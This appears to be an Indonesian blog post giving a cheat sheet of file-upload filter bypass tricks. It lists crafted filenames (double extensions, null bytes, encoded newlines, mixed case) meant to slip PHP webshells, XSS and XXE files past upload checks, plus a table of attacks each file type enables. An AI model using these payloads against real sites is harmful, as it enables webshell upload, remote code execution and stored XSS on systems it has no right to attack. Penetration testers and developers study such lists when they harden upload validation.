Bypass filter extension

pada tanggal

 Gila CMS Upload Filter Bypass and RCE | rastating.github.io

 

Bypass filter extension

XSS.html
XSS.HtMl
XSS.png.html
XSS.html.png
XSS.html%00.png
XSS.shtml
XSS.htm
<script>alert("XSS")</script>.png
XSS.svg
XSS.pdf
SHELL.php
SHELL.phtml
SHELL.gif
SHELL.%0aphp
SHELL.p%00hp
SHELL.pphp
SHELL.pfly
SHELL.phtxt
SHELL.shtp
SHELL.php%00png
SHELL.shtmp%00hp
denialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservicedenialofservice.png
XXE.xml

 

10 daftar teratas hal-hal yang dapat Anda capai dengan mengunggah file 

  • SVG: Stored XSS / SSRF / XXE
  • HTML / JS / SHTML / HTM : HTML injection / XSS / Open redirect
  • ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
  • GIF: Stored XSS / SSRF / Frame flood attack (DOS)
  • CSV: CSV injection
  • PNG / JPEG: Pixel flood attack (DoS)
  • ZIP: RCE via LFI / DoS
  • PDF / PPTX: SSRF / BLIND XXE
  • XML: XXE
  • AVI: LFI / SSRF

 

Penejelasan:

Melewati pemeriksaan ekstensi File: - Saat server memvalidasi file yang diunggah dengan membandingkan ekstensinya, validasi ini terjadi berdasarkan dua cara daftar hitam dan daftar putih ekstensi file. 

  1. Coba tambahkan karakter khusus di akhir

file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.php….
file.pHp5….

 2. Cobalah untuk melewati ekstensi ganda 

file.png.php  

file.png.pHp5

3. Cobalah untuk melewati byte nol atau menambahkan data sampah  

shell.php%00.jpg 

 shell.php%0delete0.jpg 

 file.phpJunk123png

4. Cobalah untuk melewati dengan menambahkan ekstensi yang valid sebelum ekstensi eksekusi

file.png.php  

file.png.Php5  

5. Cobalah untuk melewati dengan menggunakan huruf besar dan huruf kecil

 file.jPg 

 file.SvG 

 file.asP

 

 

 

 

 

 

 

 

 

 

 

 

Komentar

Posting Komentar